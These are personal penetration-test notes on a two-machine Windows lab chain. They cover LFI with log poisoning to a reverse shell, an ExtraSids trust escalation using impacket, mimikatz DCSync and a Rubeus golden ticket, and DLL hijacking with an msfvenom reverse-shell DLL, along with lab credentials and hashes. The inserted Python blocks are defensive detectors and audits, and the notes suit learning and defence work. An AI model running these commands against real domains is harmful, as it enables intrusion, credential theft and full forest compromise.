Trusted (Chain)
This is not a writeup, just my notes about the machine.
Machine information

Operating System: Windows
Chain: True (2 Machines)
Credentials
root
SuperSecureMySQLPassw0rd1337.
Exfiltration file
Internal Database on 10.10.222.118
✅ Valid Usernames
root
🔑 Passwords list
SuperSecureMySQLPassw0rd1337.
Information Gathering
nmap -p- -A --open -T5 -Pn -n -oN ext_trusted_tcp_allports -vvv --min-rate 3000 10.10.222.117-118
10.10.222.117
53/tcp open domain syn-ack Simple DNS Plus
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2025-04-01 13:31:12Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
464/tcp open kpasswd5? syn-ack
636/tcp open tcpwrapped syn-ack
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
3389/tcp open ms-wbt-server syn-ack Microsoft Terminal Services
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf syn-ack .NET Message Framing
47001/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open msrpc syn-ack Microsoft Windows RPC
49665/tcp open msrpc syn-ack Microsoft Windows RPC
49666/tcp open msrpc syn-ack Microsoft Windows RPC
49667/tcp open msrpc syn-ack Microsoft Windows RPC
49668/tcp open msrpc syn-ack Microsoft Windows RPC
49669/tcp open msrpc syn-ack Microsoft Windows RPC
49673/tcp open msrpc syn-ack Microsoft Windows RPC
49678/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
49690/tcp open msrpc syn-ack Microsoft Windows RPC
51583/tcp open msrpc syn-ack Microsoft Windows RPC
52197/tcp open msrpc syn-ack Microsoft Windows RPC
64160/tcp open msrpc syn-ack Microsoft Windows RPC
10.10.222.118
53/tcp open domain syn-ack Simple DNS Plus
80/tcp open http syn-ack Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/8.1.6)
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2025-04-01 13:31:11Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
443/tcp open ssl/http syn-ack Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/8.1.6)
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
3306/tcp open mysql syn-ack MySQL 5.5.5-10.4.24-MariaDB
3389/tcp open ms-wbt-server syn-ack Microsoft Terminal Services
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf syn-ack .NET Message Framing
47001/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open msrpc syn-ack Microsoft Windows RPC
49666/tcp open msrpc syn-ack Microsoft Windows RPC
49667/tcp open msrpc syn-ack Microsoft Windows RPC
49668/tcp open msrpc syn-ack Microsoft Windows RPC
49672/tcp open msrpc syn-ack Microsoft Windows RPC
49677/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
49678/tcp open msrpc syn-ack Microsoft Windows RPC
49687/tcp open msrpc syn-ack Microsoft Windows RPC
51961/tcp open msrpc syn-ack Microsoft Windows RPC
57796/tcp open msrpc syn-ack Microsoft Windows RPC
60330/tcp open msrpc syn-ack Microsoft Windows RPC
Service enumeration
10.10.90.117
SMB (enum4linux-ng)
LDAP/s: timed out
SMB: timed out
DNS
Not vulnerable to AXFR
10.10.90.118
SMB (enum4linux-ng)
LDAP/s: timed out
SMB: timed out
DNS
Not vulnerable to AXFR
HTTP

Initial Foothold
Discovering File Path Traversal
Path: http://10.10.222.118/dev/index.html?view=../../../../../../../../../../../../../../xampp/apache/logs/access.log

Poisoning the User-Agent header.

Verifying the success of the attack

Exploiting to obtain a reverse shell.
GET /dev/index.html?view=../../../../../../../../../../../../../../xampp/apache/logs/access.log&cmd=powershell+-[...] HTTP/1.1
Host: 10.10.222.118
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9,es;q=0.8
Cookie: PHPSESSID=jljs9h2k5vaj3sl6kf21alo2ns
Connection: keep-alive
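The traversal plus log-poisoning chain above leaves a very recognisable trail in the same access.log it abuses. The following is an added example (not part of these notes or the lab) that parses Apache combined-format lines, decodes nested percent-encoding, and flags three signals: `../` in the request target, a request for a log file, and a PHP open tag in a client-controlled header. It also includes a hardened `resolve_view_safely` that shows the fix for the `view` include: resolve against a base directory and refuse anything that escapes it. The log lines, IPs and User-Agent strings are constructed for the example.

```python
import os
import re
from urllib.parse import unquote

# Constructed Apache combined-format access.log lines for this example; the IPs,
# timestamps and User-Agent strings are invented, not captured from the lab host.
SAMPLE_LOG = r'''
10.10.14.5 - - [01/Apr/2025:13:40:01 +0000] "GET /dev/index.html?view=about.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.14.5 - - [01/Apr/2025:13:40:07 +0000] "GET /dev/index.html?view=../../../../xampp/apache/logs/access.log HTTP/1.1" 200 10240 "-" "Mozilla/5.0"
10.10.14.5 - - [01/Apr/2025:13:40:12 +0000] "GET /dev/index.html?view=..%2F..%2F..%2Fxampp%2Fapache%2Flogs%2Faccess.log HTTP/1.1" 200 10240 "-" "<?php echo 'poisoned'; ?>"
10.10.14.9 - - [01/Apr/2025:13:41:00 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "curl/8.5.0"
'''

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
PHP_TAG_RE = re.compile(r'<\?(php|=)', re.IGNORECASE)  # PHP open tag in a client-controlled field
LOG_TARGET_RE = re.compile(r'(access|error)\.log', re.IGNORECASE)


def fully_decode(s, rounds=3):
    """Undo up to `rounds` layers of percent-encoding so %252e%252e%252f is seen as ../"""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def analyze(entry):
    """Reasons a parsed entry looks like traversal / log-poisoning activity."""
    reasons = []
    target = fully_decode(entry["target"])
    if "../" in target or "..\\" in target:
        reasons.append("path_traversal")
    if LOG_TARGET_RE.search(target):
        reasons.append("log_file_target")
    for field in ("ua", "referer"):
        if PHP_TAG_RE.search(entry[field]):
            reasons.append(f"php_tag_in_{field}")
    return reasons


def scan(text):
    """Scan a whole log; returns one finding per suspicious line."""
    findings = []
    for n, line in enumerate(text.strip().splitlines(), 1):
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = analyze(entry)
        if reasons:
            findings.append({"line": n, "ip": entry["ip"], "reasons": reasons})
    return findings


def resolve_view_safely(base_dir, requested):
    """Hardened include resolution: decode, normalise, and refuse anything outside base_dir."""
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, fully_decode(requested)))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f['line']} from {f['ip']}: {', '.join(f['reasons'])}")
    print(resolve_view_safely("/srv/www/dev", "../../../../etc/passwd"))
```

Run it against the real access.log to get the offending source IP and the exact request that planted the tag; the hardened resolver is the shape the `view` handler should have had (an explicit allowlist of page names is stricter still).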

Compromise parent domain
During enumeration the tester discovered that the two domains share a bidirectional trust.
PS C:\xampp\htdocs\dev> Get-ADTrust -Filter *
Direction : BiDirectional
DisallowTransivity : False
DistinguishedName : CN=trusted.vl,CN=System,DC=lab,DC=trusted,DC=vl
ForestTransitive : False
IntraForest : True
IsTreeParent : False
IsTreeRoot : False
Name : trusted.vl
ObjectClass : trustedDomain
ObjectGUID : c8005918-3c50-4c33-bcaa-90c76f46561c
SelectiveAuthentication : False
SIDFilteringForestAware : False
SIDFilteringQuarantined : False
Source : DC=lab,DC=trusted,DC=vl
Target : trusted.vl
Automatic ExtraSids Attack
❯ impacket-raiseChild lab.trusted.vl/Administrator -hashes :75878369ad33f35b7070ca854100bc07 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Raising child domain lab.trusted.vl
[*] Forest FQDN is: trusted.vl
[*] Raising lab.trusted.vl to trusted.vl
[*] trusted.vl Enterprise Admin SID is: S-1-5-21-3576695518-347000760-3731839591-519
[*] Getting credentials for lab.trusted.vl
lab.trusted.vl/krbtgt:502:aad3b435b51404eeaad3b435b51404ee:c7a03c565c68c6fac5f8913fab576ebd:::
lab.trusted.vl/krbtgt:aes256-cts-hmac-sha1-96s:c930ddb15c3f84aafa01e816abc1112e38430b574ae3fcdd019e77bc906494aa
[*] Getting credentials for trusted.vl
trusted.vl/krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d9436aebee2db5c6e4166d5e2472fa2d:::
trusted.vl/krbtgt:aes256-cts-hmac-sha1-96s:3e5bc8a7d01388cdaf4ab8541f4e360d4fd9089723cedfd08f8016b7900ba2bf
[*] Target User account name is Administrator
trusted.vl/Administrator:500:aad3b435b51404eeaad3b435b51404ee:15db914be1e6a896e7692f608a9d72ef:::
trusted.vl/Administrator:aes256-cts-hmac-sha1-96s:d75ec7df1acac724a6dfc250e707aab3492b6d9936b9898f742781b0a871d4a6
Manual ExtraSids Attack
Extracting krbtgt's NTLM
PS C:\Temp> .\mimikatz.exe privilege::debug "lsadump::dcsync /domain:lab.trusted.vl /user:LAB\krbtgt /patch" exit
** SAM ACCOUNT **
SAM Username : krbtgt
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 9/14/2022 6:43:59 PM
Object Security ID : S-1-5-21-2241985869-2159962460-1278545866-502
Object Relative ID : 502
Credentials:
Hash NTLM: c7a03c565c68c6fac5f8913fab576ebd
Extracting Current Domain SID
PS C:\Temp> Get-DomainSID
S-1-5-21-2241985869-2159962460-1278545866
Extracting Enterprise Admins SID Group
PS C:\Temp> Get-ADGroup -Identity "Enterprise Admins" -Server trusted.vl
DistinguishedName : CN=Enterprise Admins,CN=Users,DC=trusted,DC=vl
GroupCategory : Security
GroupScope : Universal
Name : Enterprise Admins
ObjectClass : group
ObjectGUID : 9e72548e-1fda-486c-b426-6bcb7f171253
SamAccountName : Enterprise Admins
SID : S-1-5-21-3576695518-347000760-3731839591-519
Crafting Golden Ticket
PS C:\Temp> .\Rubeus.exe golden /rc4:c7a03c565c68c6fac5f8913fab576ebd /domain:lab.trusted.vl /sid:S-1-5-21-2241985869-2159962460-1278545866 /sids:S-1-5-21-3576695518-347000760-3731839591-519 /user:Administrator /ptt
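Both the automatic (raiseChild) and the manual path above rely on the same fact: a ticket forged in the child carries the forest root's Enterprise Admins SID in its ExtraSids, and inside a forest nothing strips it. The following is an added example (not part of these notes, Impacket, Rubeus or mimikatz) that models that reasoning from the reviewing side: it splits SIDs into domain and RID, rebuilds the `/sids:` value from the forest-root domain SID plus RID 519, and flags a foreign, privileged SID in a ticket's SID history that SID filtering on the given trust would not remove. The SIDs and trust attributes are the ones printed earlier in these notes; the `would_sid_filtering_strip` rule is a deliberately simplified model (an assumption of this example, labelled as such in the code).

```python
import re

# Matches a domain SID (S-1-5-21-<three sub-authorities>) optionally followed by a RID.
SID_RE = re.compile(r'^S-1-5-21(?:-\d+){3}(?:-(?P<rid>\d+))?$')

# Well-known RIDs that confer domain- or forest-wide control (Microsoft-documented values).
PRIVILEGED_RIDS = {
    500: "Administrator",
    512: "Domain Admins",
    516: "Domain Controllers",
    518: "Schema Admins",
    519: "Enterprise Admins",
}

# Values taken from the notes above: the child domain SID, and the forest root's
# Enterprise Admins SID that the forged ticket carries in its ExtraSids.
CHILD_DOMAIN_SID = "S-1-5-21-2241985869-2159962460-1278545866"
FOREST_ROOT_SID = "S-1-5-21-3576695518-347000760-3731839591"
FORGED_EXTRA_SIDS = ["S-1-5-21-3576695518-347000760-3731839591-519"]

# The Get-ADTrust attributes from the notes, reduced to the two that matter here.
CHILD_TO_ROOT_TRUST = {"IntraForest": True, "SIDFilteringQuarantined": False}


def split_sid(sid):
    """Return (domain_sid, rid); rid is None when the SID is a bare domain SID."""
    m = SID_RE.match(sid)
    if m is None:
        raise ValueError(f"not a domain SID: {sid}")
    rid = m.group("rid")
    return (sid, None) if rid is None else (sid.rsplit("-", 1)[0], int(rid))


def build_sid(domain_sid, rid):
    """Compose a principal SID from a domain SID and a RID (how the /sids: value was derived)."""
    return f"{domain_sid}-{rid}"


def would_sid_filtering_strip(trust):
    """
    Simplified model (assumption for this example): SID filtering removes foreign SID
    history only on a quarantined trust, and intra-forest trusts are not quarantined
    by default. That is why the forest, not the domain, is the security boundary.
    """
    return (not trust["IntraForest"]) and bool(trust["SIDFilteringQuarantined"])


def assess_extra_sids(ticket_domain_sid, extra_sids, forest_root_sid, trust):
    """
    Review a ticket's ExtraSids the way a PAC or event-log reviewer would: SIDs from the
    issuing domain are ordinary; a SID from another domain carrying a privileged RID
    that SID filtering will not strip is the signature of an ExtraSids attack.
    """
    findings = []
    for sid in extra_sids:
        domain, rid = split_sid(sid)
        if domain == ticket_domain_sid:
            continue
        finding = {
            "sid": sid,
            "from_forest_root": domain == forest_root_sid,
            "privileged_group": PRIVILEGED_RIDS.get(rid),
            "stripped_by_sid_filtering": would_sid_filtering_strip(trust),
        }
        finding["effective_escalation"] = (
            finding["privileged_group"] is not None and not finding["stripped_by_sid_filtering"]
        )
        findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in assess_extra_sids(CHILD_DOMAIN_SID, FORGED_EXTRA_SIDS, FOREST_ROOT_SID, CHILD_TO_ROOT_TRUST):
        print(f)
```

The defensive takeaway the code encodes: a child-domain compromise is a forest compromise, so the krbtgt of every domain in the forest has to be rotated (twice) after an incident like this, and any ticket whose SID history contains a RID-519 SID from another domain deserves an alert.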
Performing DCSync Attack against trusted.vl
trusted.vl
PS C:\Temp> .\mimikatz.exe privilege::debug "lsadump::dcsync /domain:trusted.vl /dc:TRUSTEDDC.trusted.vl /user:TRUSTED\Administrator /patch" exit
** SAM ACCOUNT **
SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration : 1/1/1601 12:00:00 AM
Password last change : 9/18/2022 8:50:53 PM
Object Security ID : S-1-5-21-3576695518-347000760-3731839591-500
Object Relative ID : 500
Credentials:
Hash NTLM: 15db914be1e6a896e7692f608a9d72ef
<SNIP>
Privilege escalation on labdc via DLL Hijacking
During enumeration, the tester found a custom binary named KasperskyRemovalTool.exe in C:\AVTest. Upon analysis, it was discovered that when the binary is executed, it attempts to load KasperskyRemovalToolENU.dll from the current directory. Since the DLL is not present, this behavior leads to a DLL hijacking opportunity.

To exploit this vulnerability:
1. Create a malicious DLL
2. Transfer the DLL to C:\AVTest
3. Execute the binary
msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f dll > KasperskyRemovalToolENU.dll
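The finding above is what a phantom-DLL audit turns up: the loader walks its search order, the DLL is never found, and the first directory it probed is one unprivileged users can write to. The following is an added example (not part of these notes or any tool they use) that performs that audit offline over a Process Monitor-style CSV export: it groups DLL probes per process and DLL name, keeps only DLLs that never loaded successfully anywhere in the search order, and marks a phantom load as exploitable when one of the probed directories is in a list of user-writable directories you supply from a separate ACL check. The CSV rows are constructed for the example; only the binary, DLL and directory names come from the notes.

```python
import csv
import io
import ntpath
from collections import defaultdict

# Constructed Process Monitor-style CSV export. The column names follow Procmon's
# default CSV layout; every row is invented for this example, not captured from labdc.
SAMPLE_PROCMON_CSV = r'''"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"1:02:03.0001","KasperskyRemovalTool.exe","4120","Load Image","C:\Windows\System32\ntdll.dll","SUCCESS","Image Base: 0x7ff8"
"1:02:03.0005","KasperskyRemovalTool.exe","4120","CreateFile","C:\AVTest\KasperskyRemovalToolENU.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"1:02:03.0006","KasperskyRemovalTool.exe","4120","CreateFile","C:\Windows\System32\KasperskyRemovalToolENU.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"1:02:03.0007","KasperskyRemovalTool.exe","4120","CreateFile","C:\Windows\System32\VERSION.dll","SUCCESS","Desired Access: Read Data"
"1:02:03.0008","KasperskyRemovalTool.exe","4120","Load Image","C:\Windows\System32\VERSION.dll","SUCCESS","Image Base: 0x7ff9"
'''

DLL_OPERATIONS = {"CreateFile", "Load Image"}


def find_missing_dll_loads(csv_text):
    """
    Group DLL probes per (process, dll name). A DLL the loader looked for but never found
    anywhere in its search order is a phantom load; the directories probed, in order, are
    where a planted copy would be picked up.
    """
    probes = defaultdict(list)
    for row in csv.DictReader(io.StringIO(csv_text)):
        path = row["Path"]
        if row["Operation"] not in DLL_OPERATIONS or not path.lower().endswith(".dll"):
            continue
        probes[(row["Process Name"], ntpath.basename(path).lower())].append((path, row["Result"]))

    missing = []
    for (process, dll), attempts in probes.items():
        if any(result == "SUCCESS" for _, result in attempts):
            continue  # found somewhere in the search order; not a phantom load
        missing.append({
            "process": process,
            "dll": dll,
            "probed_dirs": [ntpath.dirname(path) for path, _ in attempts],
        })
    return missing


def assess_hijack_risk(csv_text, user_writable_dirs):
    """
    Mark each phantom load as exploitable when one of the probed directories is writable
    by unprivileged users. The ACL check itself is done separately (e.g. with icacls on
    the host) and its result is passed in as a list of directories.
    """
    writable = {d.rstrip("\\").lower() for d in user_writable_dirs}
    report = []
    for item in find_missing_dll_loads(csv_text):
        exposed = [d for d in item["probed_dirs"] if d.rstrip("\\").lower() in writable]
        report.append({**item, "writable_probe_dirs": exposed, "exploitable": bool(exposed)})
    return report


if __name__ == "__main__":
    for r in assess_hijack_risk(SAMPLE_PROCMON_CSV, [r"C:\AVTest"]):
        state = "EXPLOITABLE" if r["exploitable"] else "not exposed"
        print(r["process"], r["dll"], state, r["probed_dirs"])
```

Remediation follows directly from the report: either the directory the binary lives in gets an ACL that only administrators can write to, or the missing DLL is shipped alongside the binary so the probe succeeds before the search order reaches a writable location.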